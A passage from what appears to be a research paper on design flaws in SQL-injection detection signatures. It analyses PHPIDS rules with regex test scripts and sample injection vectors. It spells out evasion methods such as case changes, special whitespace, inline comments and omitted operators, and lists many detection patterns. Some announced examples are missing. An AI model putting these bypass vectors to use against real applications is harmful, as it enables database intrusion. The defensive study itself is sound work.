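BENIGN = ["projector screen", "preorder"]


def flagged(label: str, text: str) -> bool:
    """Return True if the signature with the given label matches the text."""
    return re.search(SIGNATURES[label], text, re.IGNORECASE) is not None


def summarize() -> dict:
    """Map each signature label to the list of inputs it flags."""
    inputs = ATTACKS + BENIGN
    return {label: [t for t in inputs if flagged(label, t)] for label in SIGNATURES}


if __name__ == "__main__":
    for label, hits in summarize().items():
        print(f"{label:8s} flags {hits}")
```

On these inputs, only the second expression flags all three vectors while leaving both benign strings alone. It is
still not free of false positives: an ordinary phrase such as "black or white" also matches it.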
Union-based exploitation is another injection technique, which uses the 'UNION' clause to join a forged query to the
original query. It allows the attacker to obtain records from other tables. An instance of a query infected by the
attack code is given below.
• Select id, name from user_table where id = 1union select id, name from product_table
(?:union\W+select) seems a good expression to detect such attack vectors. But since a union clause can also be
followed by the “all/distinct/distinctrow” predicates, the attacker has several options for evading the signature.
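The gap can be made concrete with a small check. The first pattern below is the expression quoted above. The second
is a hypothetical widened variant written for this illustration (it is not a PHPIDS rule), and the query strings are
likewise assumed examples built from the query shown earlier.

```python
import re

# Signature quoted from the text.
BASIC = re.compile(r"(?:union\W+select)", re.IGNORECASE)

# Hypothetical widened variant that tolerates an optional predicate after UNION.
WIDENED = re.compile(
    r"(?:union\W+(?:(?:all|distinct|distinctrow)\W+)?select)", re.IGNORECASE
)

QUERIES = [
    "1union select id, name from product_table",
    "1 union all select id, name from product_table",
    "1 union distinct select id, name from product_table",
    "1 union distinctrow select id, name from product_table",
]


def matches(pattern: re.Pattern, queries: list) -> list:
    """Return one boolean per query: True if the pattern matches it."""
    return [pattern.search(q) is not None for q in queries]


if __name__ == "__main__":
    print("basic  :", matches(BASIC, QUERIES))
    print("widened:", matches(WIDENED, QUERIES))
```

The quoted expression matches only the first query. The widened variant matches all four, at the cost of a more
complex rule.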
The two injection techniques discussed above show what exact knowledge a developer should have about the structure
of attack vectors for formulating the rules. A small mistake in the knowledge domain will lead to the creation of a
signature with holes and allow the attacker to launch the attack.
SQL is supported by a number of Relational Database Management Systems (RDBMSs) including MySQL, Microsoft
SQL Server and Oracle. Although all of them implement the same SQL syntax, there are certain differences in terms
of SQL query code and supported keywords. Here, we highlight some of the differences that exist between MySQL and
SQL Server. The two code snippets below demonstrate the syntactic variation between their queries. In the case of SQL
Server, both of the following code snippets (1 and 2) are valid, whereas for MySQL, only the second snippet works.
2. insert into abc values(1) (supported by both SQL Server and MySQL)
Due to these minor syntactic variations, there is a high possibility that signatures created for one database system
will fail to detect attack vectors for another database system. Consider the following two regular expressions. The
expression (?:insert\W+\w) will recognize both code snippets in user input as attack vectors, whereas the expression
(?:insert into\W+\w) will fail to detect the first snippet in the input.
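A quick check of the two expressions, as a sketch under one assumption: the first snippet is taken to be the same
statement as snippet 2 with the INTO keyword omitted (insert abc values(1)). That form is inferred from the
description above rather than quoted from it.

```python
import re

# Both expressions are quoted from the text.
GENERIC = re.compile(r"(?:insert\W+\w)", re.IGNORECASE)
INTO_ONLY = re.compile(r"(?:insert into\W+\w)", re.IGNORECASE)

# The first entry is an assumed form of snippet 1; the second is snippet 2.
SNIPPETS = ["insert abc values(1)", "insert into abc values(1)"]


def detects(pattern: re.Pattern, text: str) -> bool:
    """Return True if the pattern matches anywhere in the text."""
    return pattern.search(text) is not None


if __name__ == "__main__":
    for snippet in SNIPPETS:
        print(snippet, "->", detects(GENERIC, snippet), detects(INTO_ONLY, snippet))
```

Under that assumption, the generic expression flags both statements, while the expression that requires the INTO
keyword flags only the second.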
Besides syntactic differences, the list of supported SQL keywords and operators also varies among database
systems. For example, the 'LIMIT' clause, which is not part of standard SQL, is supported as a vendor extension by
MySQL, while SQL Server uses the 'TOP' clause to perform a similar operation.
As another example, MySQL supports both the double dash (--) and the hash (#) for adding an inline comment to
a query, whereas SQL Server supports only the double dash (--).
• Select* from abc where id =1 or 1=1 -- hhh (supported by both, MySQL and SQL Server)
The attack vectors are tailored according to the underlying database, and since it is highly likely that signatures that
are working fine for one database may fail in detecting attacks for another database, a developer should be aware of
these DBMS variations before formulating the rules.
Attack vectors are intended to attain one of the following three objectives: to perform unauthorized operations on the
server, to raise a logical error message, or to probe the web application. In order to perform unauthorized operations,
the attacker has to craft the malicious string intelligently. For example, consider the modified query, select id, name
from user_tbl where id = 1 union select table_name, column_name from information_schema.columns. The query has
been tailored by the attacker to retrieve the list of all the tables stored in the database along with their
column names. But before crafting such attack strings, the attacker first needs to know the structure of the underlying
query. For this purpose the attacker can use the logical error messages generated by the server, and raising them is
the second intention of attack vectors. Such messages usually help the attacker gain information about the structure
of the database or query. These attack vectors again must follow a strict format in order to raise a logical error
message. For example, the attacker may use the 'ORDER BY' clause and run the following sequence of queries to determine
the number of columns.
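A sequence of this kind can be reproduced locally. The sketch below runs against an in-memory SQLite database rather
than MySQL, which is an assumption made so the example is self-contained; the table contents and the helper name
count_columns are hypothetical. It appends "order by 1", "order by 2", ... to the base query until the database
rejects the position.

```python
import sqlite3


def count_columns(conn: sqlite3.Connection, base_query: str, max_columns: int = 10):
    """Infer the column count of base_query from the first failing ORDER BY position."""
    for position in range(1, max_columns + 1):
        try:
            conn.execute(f"{base_query} order by {position}")
        except sqlite3.OperationalError:
            # The first rejected position is one past the last valid column.
            return position - 1
    return None  # no error within max_columns positions


# Hypothetical table mirroring the query used in the text.
conn = sqlite3.connect(":memory:")
conn.execute("create table user_tbl (id integer, name text)")
conn.execute("insert into user_tbl values (1, 'alice')")

columns = count_columns(conn, "select id, name from user_tbl where id = 1")
print(columns)
```

The error text and the exact behaviour differ between database systems, which is one reason a signature for this
class of vector has to target the "order by <number>" format of the request.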
The server will execute the first two queries but raise an error in the third case, which gives the attacker the clue
that there are 2 columns. Probing is the third intention of attack vectors, and is used to determine
whether the web application is vulnerable to injection attacks. A quotation mark (inverted comma) is most often used
for this purpose. If the infected query causes the database server to raise a syntax error, the underlying
web application is presumed to be exposed to SQL injection. For example, the following syntax error message is
generated by a MySQL-compatible (MariaDB) server.
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB
server version for the right syntax to use near '"' at line 1
The most important property of the attack vectors used for probing the application is that they are not required to
follow a rigid structure. A simple mistake in the spelling of a SQL clause may also cause the server to generate a
syntax error.
For example:
Since attack strings serving the first two objectives must obey a specific format, efficient signatures can be
designed to capture that format in order to detect the attacks. On the other hand, to cover the attack vectors used for
probing, a signature needs to be highly generic, which might put the detection system at risk of a greater
number of false positive alarms. An alternative approach could be to design a signature that inspects the output
generated by the server (the HTTP response), since the error generated by the database is mostly the same.
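A response-side check of this kind might look like the sketch below. The pattern is built from the MySQL/MariaDB
message quoted earlier. The function name and the sample response bodies are hypothetical, and other database
systems would need their own patterns.

```python
import re

# Pattern taken from the MySQL/MariaDB syntax error message quoted in the text.
SQL_ERROR = re.compile(r"you have an error in your sql syntax", re.IGNORECASE)


def response_reveals_sql_error(body: str) -> bool:
    """Return True if the response body contains the database syntax error text."""
    return SQL_ERROR.search(body) is not None


# Hypothetical response bodies.
leaky_body = (
    "<p>You have an error in your SQL syntax; check the manual that corresponds "
    "to your MariaDB server version for the right syntax to use near '\"' at line 1</p>"
)
normal_body = "<p>No products matched your search.</p>"

if __name__ == "__main__":
    print(response_reveals_sql_error(leaky_body))
    print(response_reveals_sql_error(normal_body))
```

Because the rule looks at what the server returns rather than at what the client sends, it does not depend on the
shape of the probing input.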
Tampering schemes are used by the attacker specifically to evade the detection rules of the system. Attackers have
a number of options to tamper with SQL attack vectors. Encoding techniques, such as URL encoding, Base64
encoding, Unicode encoding, etc., are the most common methods used to bypass SIDS. Case changing is another
technique that works effectively if the designed signatures are not case-insensitive. For instance, the regular
expression (?:union\s+select) will fail to detect the attack payload containing “Union sElect” as a substring. The
attacker may also play with white-spaces to bypass the rules. For example, the regular expression (?:union\s+select)
will fail to detect the attack payload containing the string “union%A0select” where %A0 represents the non-breaking
space character. Similarly, the space-sensitive regular expressions (e.g. (?:union\sselect)) will fail to detect the attack
payload with irregular spacing in the content (e.g. union%20%20select).
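The three evasions above can be reproduced with a short sketch. It assumes byte-oriented, case-sensitive matching, so that \s covers ASCII whitespace only (a Unicode-aware engine may treat the non-breaking space as whitespace); the helper name and the payloads around the keywords are illustrative.

```python
import re
from urllib.parse import unquote_to_bytes

# Assumption: bytes patterns, so \s means ASCII whitespace only and
# matching is case-sensitive, as in the scenarios described in the text.
SIG_PLUS = re.compile(rb"(?:union\s+select)")
SIG_ONE = re.compile(rb"(?:union\sselect)")

def detected(signature, raw_payload: str) -> bool:
    """URL-decode the payload to bytes and test it against one signature."""
    return signature.search(unquote_to_bytes(raw_payload)) is not None

print(detected(SIG_PLUS, "1 union select 1"))      # True: baseline
print(detected(SIG_PLUS, "1 Union sElect 1"))      # False: case changing
print(detected(SIG_PLUS, "1 union%A0select 1"))    # False: non-breaking space
print(detected(SIG_ONE, "1 union%20%20select 1"))  # False: irregular spacing
```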
These tampering problems can be handled by pre-processing functions that convert the input into a standard format
before the detection rules are applied, for example by making all characters lowercase, removing extra whitespace and
decoding encoded characters. This significantly lowers the complexity burden on the signatures and also enhances
Identification of Flaws in the Design of Signatures for Intrusion Detection Systems
the performance of the system. However, there are some sophisticated tampering schemes that cannot be handled by
pre-processing routines. Adding comments within the attack vectors is one of the notorious ways attackers
fool the signatures. For instance, the signature (?:union\s+select) can be bypassed using “union/**/select” or “union
/*!select*/” in the attack vectors. Therefore, the developer needs to know which tampering schemes cannot
be handled by pre-processing techniques and must instead be dealt with by the signatures.
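A minimal sketch of such a pre-processing step is given below. The normalize function is a hypothetical stand-in, not the PHPIDS converter; it only decodes URL escapes, lowercases, and collapses whitespace.

```python
import re
from urllib.parse import unquote

SIGNATURE = re.compile(r"(?:union\s+select)")

def normalize(raw: str) -> str:
    """Decode URL escapes, lowercase, and collapse runs of whitespace."""
    decoded = unquote(raw)
    return re.sub(r"\s+", " ", decoded.lower())

def detected(raw: str) -> bool:
    """Apply the signature to the normalized input."""
    return SIGNATURE.search(normalize(raw)) is not None

print(detected("1 Union%20%20sElect 1"))  # True: case and spacing are normalized away
print(detected("1 union/**/select 1"))    # False: the comment survives normalization
print(detected("1 union /*!select*/ 1"))  # False
```

The last two payloads show why comment handling has to be addressed either by a dedicated pre-processing step or inside the signature itself.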
In this section, we discussed the key points to focus on when acquiring domain knowledge for designing
intrusion detection signatures. The points are briefly summarized as follows:
• Each injection technique is associated with its own set of attack vectors, whose structural peculiarities need to be
studied carefully and rigorously.
• There are significant differences among database systems in terms of syntax and supported keywords,
which may make signatures designed for one system perform poorly on another.
• Signatures cannot be created for every attack vector; doing so would result in extremely generic
signatures, which would in turn increase the number of false positive alerts.
• Some tampering schemes can be handled at the pre-processing stage, while others must be handled
exclusively by the signatures.
In the next section, we present a case study that analyzes the quality of the signature set of PHPIDS, a well-known
signature-based intrusion detection system for web application attacks.
4. Case Study
The performance of a SIDS relies strongly on the quality of its signatures. A good signature is generally
one that keeps a proper balance between sensitivity and specificity. We conducted an experiment on
PHPIDS, a PHP-based intrusion detection system, to assess the quality of its signatures. The tool provides over
2,500 attack signatures for guarding PHP applications against different categories of web attacks such as XSS, SQLi,
directory traversal, etc. In the experiment, we considered only those signatures designed to detect SQL injections. We
assessed the detection tool based on the following parameters:
• The contribution of individual signatures in the detection mechanism to determine its worthiness in the
detector
We employed a white-box testing methodology to carry out the evaluation. We analyzed the structure of
each regular expression and designed five attack vectors per signature, so that the attack vector set
covers every signature under test. The assumption behind the experiment is that highly generic signatures will also
detect a large number of attack vectors that were not designed for them, whereas highly specific signatures will
detect only their own attack vectors.
In PHPIDS, the number of regular expressions for recognizing SQL attacks is over 100. However, the experiment was
conducted on only 83 SQL injection signatures: those for which logical attack vectors can be designed, i.e. vectors
that make a database server either execute the injected query successfully or display some semantic error message. In
PHPIDS, we found a number of signatures that detect only attack vectors causing syntax errors. In section
3.3, we discussed that attack vectors causing syntax errors do not follow a rigid structure, and so are difficult to
capture with regular expressions that verify input data. These vectors can be handled efficiently by designing
signatures that inspect the HTTP response data. In order to evaluate the contribution of each signature, we created a
set of 415 attack vectors, with five attack vectors per signature (83 × 5 = 415). Appendix 1 provides the list of
signatures under consideration along with their attack vectors. We developed a vulnerable web application, hosted it
on localhost and integrated it with PHPIDS. We used an iMacros-based script [12] to automate the process of sending
attack requests to the website. The graph in Figure 1 shows the number of attack vectors detected by each
signature.
It is clearly visible from the graph that the contribution of some signatures is far higher than that of the rest. For
example, signature S7 alone detected 50.1% of the attack vectors. Based on their contribution, the signatures are divided
into two sets, A and B. Set A contains the signatures that contributed most to the detection process; it has a
total of 10 signatures, as shown in Table 1. Set B contains the remaining 73 signatures.
The first observation from the experiment is that the signatures in set A are generic in nature, and
thereby provide broader detection coverage, while the signatures in set B are more restrictive. For example, consider
signature S79 (?:--[^\n]*$) from set A and signature S2 (?:"\s*(?:#|--|{)) from set B. The former
looks for the presence of a double-dash (--) in the input, whereas the latter puts an extra restriction on the input
and categorizes it as suspicious only if it contains, at a minimum, an inverted comma (") followed by a hash (#), a
double-dash (--) or an opening brace ({). The more restrictions we put in a rule, the more specific it becomes and the
less detection coverage it provides.
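The difference in coverage between S79 and S2 can be seen on a few inputs. The sketch below is only an illustration: the sample inputs are made up, case-insensitive matching on raw input is assumed, and the brace in S2 is written as \{ for Python, which does not change its meaning.

```python
import re

# Signatures copied from the text; matching flags are an assumption.
S79 = re.compile(r'(?:--[^\n]*$)', re.IGNORECASE)
S2 = re.compile(r'(?:"\s*(?:#|--|\{))', re.IGNORECASE)

# Hypothetical inputs, not taken from the article's test set.
samples = ['admin" -- ', 'id=1 -- x', 'admin" #', 'plain text']

coverage = {
    text: (S79.search(text) is not None, S2.search(text) is not None)
    for text in samples
}
for text, (by_s79, by_s2) in coverage.items():
    print(f"{text!r}: S79={by_s79}, S2={by_s2}")
```

On these inputs S79 fires whenever a double-dash is present, while S2 additionally requires the preceding inverted comma.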
S7 (?:(?:^["\\]*(?:[\d"]+|[^"]+"))+\s*(?:n?and|x?or|not|\|\||\&\&)\s*[\w"[+&!@(),.-])
S15 (?:"[\s\d]*[^\w\s]+\W*\d\W*.*["\d])
S19 (?:union\s*(?:all|distinct|[(!@]*)?\s*[([]*\s*select)
S35 (?:"\s*[^?\w\s=.,;)(]+\s*[(@"]*\s*\w+\W+\w)
S44 (?:^[\W\d]+\s*(?:union|select|create|rename|truncate|load|alter|delete|update|insert|desc))
S72 (?:;?\s*(?:select|union|having)\s*[^\s])
S77 (?:\Wselect.+\W*from)
S79 (?:--[^\n]*$)
S81 (?:[^*]\/\*|\*\/[^*])
S36 (?:select\s*[\[\]()\s\w\.,"-]+from)
In the next experiment, we compared the detection accuracy of the two sets individually on the same set of attack
vectors. Figure 2 shows the detection statistics of the two sets in a Venn diagram. We observed that
set A, which consists of just 10 signatures, detected 386 of the 415 attack vectors, whereas set B, which has 73
signatures, detected 384. This implies that the signatures in set A are extremely sensitive: with only 10 signatures
they provide PHPIDS with detection coverage comparable to that of set B. Moreover, 7.5% of the attack vectors are
detected exclusively by set A, which also shows the significance of these signatures in PHPIDS. Note that although
generic signatures provide broader detection coverage, they also increase the risk of false positive alarms. For
example, signatures S44 and S72 merely look for keywords such as “union”, “select”, “create”, etc. in the input string
without imposing a restriction on the structure of the input in which they are used. Since these words are common in
everyday language, there is a higher chance that benign input will also be categorized as suspicious.
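The figures above can be cross-checked with a little set arithmetic. This is a sketch that assumes the 7.5% share corresponds to a whole number of vectors obtained by rounding; the variable names are illustrative.

```python
TOTAL = 415          # attack vectors in the experiment
DETECTED_BY_A = 386  # vectors detected by set A
DETECTED_BY_B = 384  # vectors detected by set B
ONLY_A_SHARE = 0.075 # share detected exclusively by set A

only_a = round(ONLY_A_SHARE * TOTAL)  # 31.125 rounds to 31 vectors
both = DETECTED_BY_A - only_a         # vectors detected by A and B
only_b = DETECTED_BY_B - both         # vectors detected by B alone
union = only_a + both + only_b        # vectors detected by A or B

print(only_a, both, only_b, union)    # 31 355 29 415
print(f"{both / TOTAL:.1%}")          # 85.5%
print(f"{only_b / TOTAL:.1%}")        # 7.0%
```

Under these assumptions, 355 vectors are caught by both sets and 29 only by set B.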
The second observation from the experiment is that 85.5% of the attack vectors are detected by both sets. After
carefully assessing the structure of the signatures in both sets, we found that the generic signatures in set A
supersede most of the signatures of set B. For example, consider signature S72
(?:;?\s*(?:select|union|having)\s*[^\s]). The minimum requirement for an input to trigger the signature is that it
contains the word “select”, “union” or “having” as a substring, followed by at least one non-whitespace character. Some
of the signatures of set B superseded by S72 are shown in Table 2. The presence of such generic signatures in the
detection system calls into question the existence of the superseded signatures by making them obsolete.
S38 (?:in\s*\(+\s*select)
S49 (?:@.+=\s*\(\s*select)
S55 (?:\(\s*select\s*\w+\s*\()
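The supersession by S72 can be checked on one vector per listed signature. The vectors below are hypothetical examples written for this sketch, and case-insensitive matching on raw input is assumed.

```python
import re

FLAGS = re.IGNORECASE  # assumption about how the rules are applied

S72 = re.compile(r'(?:;?\s*(?:select|union|having)\s*[^\s])', FLAGS)
SPECIFIC = {
    "S38": re.compile(r'(?:in\s*\(+\s*select)', FLAGS),
    "S49": re.compile(r'(?:@.+=\s*\(\s*select)', FLAGS),
    "S55": re.compile(r'(?:\(\s*select\s*\w+\s*\()', FLAGS),
}
# One illustrative vector per specific signature (not from the article).
VECTORS = {
    "S38": "1 in (select 1)",
    "S49": "@a = (select 1)",
    "S55": "(select count(*) from t)",
}

results = {}
for name, vector in VECTORS.items():
    by_specific = SPECIFIC[name].search(vector) is not None
    by_s72 = S72.search(vector) is not None
    results[name] = (by_specific, by_s72)
    print(f"{name}: specific={by_specific}, S72={by_s72}")
```

Each vector that triggers its specific signature also triggers S72, because each contains “select” followed by a non-whitespace character.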
The third observation from the experiment is that 6.9% of the attack vectors are recognized only by the
signatures in set B. Recall that the signatures in set B are specific, whereas those in set A are generic.
We found two main reasons why the generic signatures of set A could not handle these attack vectors. The first reason
is that even generic signatures are not designed to capture all the variations that an attacker can use in a
vector. For example, consider signature S7
(?:(?:^["\\]*(?:[\d"]+|[^"]+"))+\s*(?:n?and|x?or|not|\|\||\&\&)\s*[\w"[+&!@(),.-]). The signature is crafted to
detect logic operators in the attack payload, namely nand, and, xor, or, not, || and &&, but ignores the two least-used
operators, “^” and “|”. This gives the attacker an open passage to attack the application without being detected
by the generic signature, as given in the following examples.
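The gap in S7 can be reproduced with a small sketch. The vectors are illustrative and are not the article's own examples; “1 ^ 0” and “1 | 0” rely on MySQL treating ^ and | as bitwise operators, and the regular expression is applied to raw input with case-insensitive matching, which is an assumption.

```python
import re

# S7 copied from the text; the flag is an assumption.
S7 = re.compile(
    r'(?:(?:^["\\]*(?:[\d"]+|[^"]+"))+\s*(?:n?and|x?or|not|\|\||\&\&)\s*[\w"[+&!@(),.-])',
    re.IGNORECASE,
)

# Illustrative vectors: the first three use covered operators,
# the last two use the operators the signature omits.
vectors = ["1 or 1", "1 xor 0", "1 && 1", "1 ^ 0", "1 | 0"]

matches = {v: S7.search(v) is not None for v in vectors}
for vector, hit in matches.items():
    print(f"{vector!r}: detected={hit}")
```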
The second reason is that set A does not contain a generic signature for every class of attack vectors. For example,
there is no generic signature in set A for the “group by” clause, and therefore the attack vector
1%20group%20by%20(2) is detected only by signature S51 (?:\d\s+group\s+by.+\() of set B. Moreover, the attack
categories missed by the generic signatures give a clue to possible blind spots in the IDS, as the
non-generic signatures of set B are both susceptible and insufficient. The fourth observation is that there are
plenty of attack vectors for which there are no signatures in the detection system. In Table 3, we list some of the
susceptible signatures of PHPIDS that let attackers penetrate the application. The part of each attack
vector responsible for bypassing the signature is highlighted in the table.
Table 3. Examples of attack vectors bypassed by IDS due to the incapability of the signatures
The case study of the PHPIDS signatures yielded several significant observations about the quality of its
signature set. In the next section, we discuss the flaws in the design of the signatures based on the identified issues.
In the previous section, we assessed the structure of the PHPIDS signatures and identified various flaws in their
design that yield weak signatures and degrade the performance of a SIDS. Based on the flaws in signature
design practice, we divide weak signatures into six categories, discussed as follows:
SQL has sets of operators that can be used interchangeably in an attack vector from the point of view of syntax.
Logical operators such as AND, OR and XOR are used to determine whether a row should be
selected for the output, and they can be swapped for one another in an attack vector to carry out an adversarial
operation. Some attack vectors that are logically the same from the attack perspective are shown
below:
• 1 xor 0
• 1 or 0
• 1 and 1
This implies that a rule designed to detect one operator should cover the related operators as well. A complete
signature is one that incorporates all of the related operators in its rule; a signature is called
incomplete if it specifies only some of them. Mathematically, this can be defined as follows:
Definition 1: Let $RO_{SQL}$ = { set of related operators in SQL }, $St_{Ro}$ = { $RO_{SQL}(1), \ldots, RO_{SQL}(m)$ } and
$SO(n)$ = { set of operators specified in signature $S(n)$ }. A signature $S(n)$ is incomplete iff
$RO_{SQL}(i) \cap SO(n) \neq \emptyset$ and $RO_{SQL}(i) \not\subset SO(n)$ for some $i$,
where $i = 1$ to $m$.
An incomplete signature can easily be bypassed by using the operators in $RO_{SQL}(i) \setminus SO(n)$ in the attack
payload. For example, let $RO_{SQL}(1)$ = {and, or, xor} and $RO_{SQL}(2)$ = {||, &&, ^, |, &} be two sets of related
operators. Consider the S6 signature, (?:"\s*or\s*"?\d), for which $SO(6)$ = {or}. The signature satisfies both
conditions of incompleteness, i.e. $RO_{SQL}(1) \cap SO(6) \neq \emptyset$ and $RO_{SQL}(1) \not\subset SO(6)$. Since the
signature is incomplete, an attacker can evade the rule by using “AND” or “XOR” in the vector. Consider the S5
signature (?:(?:(n?and|x?or|not)\s+|\|\||\&\&)\s*\w+\(), for which $SO(5)$ = {nand, and, or, xor, not, ||, &&}. The
signature does not fulfill the conditions of the definition with respect to the set $RO_{SQL}(1)$, since
$RO_{SQL}(1) \subset SO(5)$. However, it does satisfy them with respect to the set $RO_{SQL}(2)$, as
$RO_{SQL}(2) \cap SO(5) \neq \emptyset$ and $RO_{SQL}(2) \not\subset SO(5)$.
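The incompleteness test of Definition 1 maps directly onto set operations. The following is a minimal sketch using the operator sets and the S5 and S6 examples from the text; the function and variable names are assumptions made for illustration.

```python
# Related-operator sets as given in the text.
RO_1 = frozenset({"and", "or", "xor"})
RO_2 = frozenset({"||", "&&", "^", "|", "&"})
RELATED_SETS = [RO_1, RO_2]

def incomplete_with_respect_to(related_sets, signature_ops):
    """Return the related sets that the signature covers only partially:
    the intersection is non-empty, yet the set is not contained in SO(n)."""
    return [
        ro for ro in related_sets
        if ro & signature_ops and not ro <= signature_ops
    ]

SO_6 = {"or"}                                            # operators in S6
SO_5 = {"nand", "and", "or", "xor", "not", "||", "&&"}   # operators in S5

print(incomplete_with_respect_to(RELATED_SETS, SO_6) == [RO_1])  # True
print(incomplete_with_respect_to(RELATED_SETS, SO_5) == [RO_2])  # True
print(sorted(RO_2 - SO_5))  # operators an attacker can still use against S5
```

The set difference printed on the last line is exactly the list of operators that bypass the rule.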
The presence of incomplete signatures may create loopholes in the detection system. In section 4, we discussed that
some attack vectors managed to bypass the IDS because of the incomplete design of the generic signature S7. The
signature ignores three operators (|, & and ^) in its regular expression, which leaves an open gate for
attackers to reach the database without being recognized. Therefore, it is important to assess the
structure of the signatures to determine whether the signature developer specified all of the related operators in the
rules. Completeness of the rule set makes the signatures more effective by enhancing their ability to detect variants
of an attack vector.
In section 3.3, we discussed the fact that from the perspective of intention of the attacker, a query can be modified by
attack vectors to carry out one of the three objectives, i.e. to make the database server successfully execute the query,
to make it generate a semantic error or to make it raise a syntax error. We also observed that the attack vectors causing
syntax errors are not restricted to a particular structure, and so make it extremely difficult to design a rule for
detecting them. These attacks can be best handled by designing the rule that inspects the response generated by the
server.
In the irrelevant category, we put all those signatures for which no logical attack vector can be designed.
A logical attack vector is one that is executed as part of the SQL code in such a way that either an unauthorized
operation is performed on the database or a logical error message is displayed to the attacker. A signature is termed
irrelevant for two reasons. First, it does not detect any logical vector. Second, it is not
intentionally designed to detect illogical attack vectors (attack vectors causing syntax errors); rather, a flaw in
the design of the signature makes it lose its significance in the detector. Mathematically, irrelevant signatures can
be defined as follows:
Definition 2: Let $L_a$ = { set of logical attack vectors } and $S_a(n)$ = { set of attack vectors detected by $S(n)$ }. A
signature is irrelevant iff $L_a \cap S_a(n) = \emptyset$. The condition is represented graphically as a Venn diagram in
the following figure.
Fig.3 Relation between the logical attack vectors and the vectors detected by irrelevant signatures
Consider the irrelevant PHPIDS signature (?:"[\s\d]+=\s*\d). To understand the flaw in the design of
the signature, let us split the regular expression into two parts, (") and ([\s\d]+=\s*\d). A double quote (") in a
SQL injection vector marks either the end or the beginning of a string literal. In the former case, it must
be followed by some SQL operator, such as a logical operator (OR, AND, ||, etc.) or a query operator (UNION, IN,
etc.). But the regular expression does not leave any room for such operators, which makes the construction of a
logical attack vector nearly impossible. In the latter case, where the double quote marks the beginning of a string,
everything that follows it until the next double quote is treated as a string literal. The value of the
string literal does not matter in the attack vector and ranges over [\W\w]*, so the second part of the
regular expression loses its significance. As another example, take the irrelevant
signature (?:"\s+and\s*=\W). Here the problem lies in the sub-expression (and\s*=), which
demands that the attack vector use the “AND” clause followed by the “EQUAL” operator (=), with optional spaces in
between. The “AND” clause needs a predicate that evaluates to either 0 or some non-zero value, and the “EQUAL”
operator must have operands on both its left-hand and right-hand sides. But the expression does not allow anything
between “AND” and “=”, so no logical attack vector can satisfy it.
The signature became irrelevant mainly because of the error in the implementation of the rule by the designer. The
designer should test the designed signatures to determine if the rules are implemented in the same way as intended.
Since no logical attack vector can satisfy these rules, it is highly unlikely that these signatures will ever be triggered in
the monitoring process. Furthermore, irrelevant signatures unnecessarily increase the size of the signature set, which
in turn increases the processing requirement of the detector to verify a request. Since the experiment is conducted on
the signatures for which logical attack vectors can be designed, the irrelevant signatures are not listed in Appendix A.
A single signature is generally built upon multiple criteria in order to verify the input from several perspectives. For
instance, the S12 signature, (?:\Winformation_schema|table_name\W) looks for either “INFORMATION_SCHEMA”
or “TABLE_NAME” as suspicious keywords in the user payload to recognize SQL injection. It implies that the quality
of a signature can get degraded if the individual sub-rules are not thoroughly implemented. Semi-relevant signatures
are those signatures in which at least one of the sub-rules is not relevant. We define the semi-relevant signature as
follows:
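Definition 3: Let $SS(n)$ be the set of sub-signatures of $S(n)$, i.e. $SS(n)$ = { $sS(1,n), \ldots, sS(m,n)$ }, where $m$
denotes the total number of sub-signatures in $S(n)$. Let $sS_a(i,n)$ = { set of attack vectors detected by the $i$th
sub-signature of $S(n)$ }. A signature $S(n)$ is semi-relevant iff $L_a \cap sS_a(i,n) = \emptyset$ for at least one $i$,
where $i = 1$ to $m$.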
Consider the signature S52, (?:(?:;|#|--)\s*(?:drop|alter)). The signature can be split into two parts, (?:;|#|--) and
(?:drop|alter). The first part consists of three options and the second part of two
options, so the whole signature is composed of six (3x2) criteria: (?:(?:;)\s*(?:drop)),
(?:(?:;)\s*(?:alter)), (?:(?:#)\s*(?:drop)), (?:(?:#)\s*(?:alter)), (?:(?:--)\s*(?:drop)) and (?:(?:--)\s*(?:alter)). The
last four criteria are not conceptually valid, as the database server ignores the content of the line after a
comment operator. Therefore, the attacker cannot issue the drop or alter command after placing the comment
operator. The same issue lies with the S53 signature, (?:(?:;|#|--)\s*(?:update|insert)\s*\w{2,}), which looks for
update and insert operations preceded by a comment operator. One more example of a semi-relevant signature is
S83, (?:";\s*(?:if|while|begin)). This signature has one irrelevant sub-rule, (?:";\s*(?:while)), which is triggered by
vectors that use the “WHILE” clause after the semicolon (;) operator. The semicolon is used by the attacker to
conduct stacked-query operations, and no valid SQL query can begin directly with a “WHILE” clause. Hence an
attack vector satisfying this sub-rule is not logically valid and would only make the database server raise a syntax
error.
Semi-relevant signatures mainly arise when the developer treats SQL keywords or
operators that belong to different contexts as if they were alike. In signature S52, the rule handles the
semicolon (;) and the comment operators (#, --) in the same manner, whereas the semicolon is used to invoke
stacked-query operations and comment operators are used to make the query ignore certain content. Therefore,
assessing the quality of the sub-rules of a signature helps in generating a more efficient signature set for the detector.
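The decomposition of S52 into its six criteria can be generated mechanically. The sketch below expands the two alternations with a Cartesian product and labels each sub-rule following the reasoning in the text (a command placed after a comment operator is ignored); the names are illustrative.

```python
from itertools import product

PREFIXES = [";", "#", "--"]      # first alternation of S52
COMMANDS = ["drop", "alter"]     # second alternation of S52
COMMENT_OPERATORS = {"#", "--"}  # per the text, content after these is ignored

sub_rules = []
for prefix, command in product(PREFIXES, COMMANDS):
    pattern = rf"(?:(?:{prefix})\s*(?:{command}))"
    relevant = prefix not in COMMENT_OPERATORS
    sub_rules.append((pattern, relevant))
    print(pattern, "relevant" if relevant else "not relevant")

not_relevant = sum(1 for _, relevant in sub_rules if not relevant)
print(len(sub_rules), not_relevant)  # 6 4
```

Since at least one sub-rule is not relevant while others are, S52 falls into the semi-relevant category.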
There is one big difference between a normal query and an attack query: the latter uses unconventional means
to achieve its goal in order to bypass the signatures. So, if the developer is not thoroughly aware of attacker
strategies and tactics, and formulates the signature based on knowledge of commonly used queries, the attacker may
ultimately subvert the detection mechanism. The simplest way to bypass a regular expression is
to use special characters, such as whitespace and brackets, in the attack payload. These characters
can be repeated in the payload without restriction, which implies that if the developer limits the
number of occurrences of these characters in the signature, the attacker can easily bypass the expression. We call such
signatures susceptible signatures. For example, consider the S63 signature,
(?:;\s*(?:select|create|rename|truncate|load|alter|delete|update|insert|desc)\s*[\[(]?\w{2,}). The sub-expression
“[\[(]?” makes the regular expression susceptible. An attack vector can use the parenthesis
multiple times, while the regular expression explicitly restricts its use to 0 or 1 times. This means the attacker can
bypass the signature by using the character “(” more than once, as follows:
Similarly, the S68 signature, (?:waitfor\s*delay\s?"+\s?\d) is also vulnerable to attacks. The sub-expression “\s?” in
the signature allows the attacker to evade it by using more than one space in the attack vector.
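Both weaknesses can be demonstrated with a short sketch. The vectors are illustrative and not taken from the article, and the signatures are applied to raw input with case-insensitive matching, which is an assumption.

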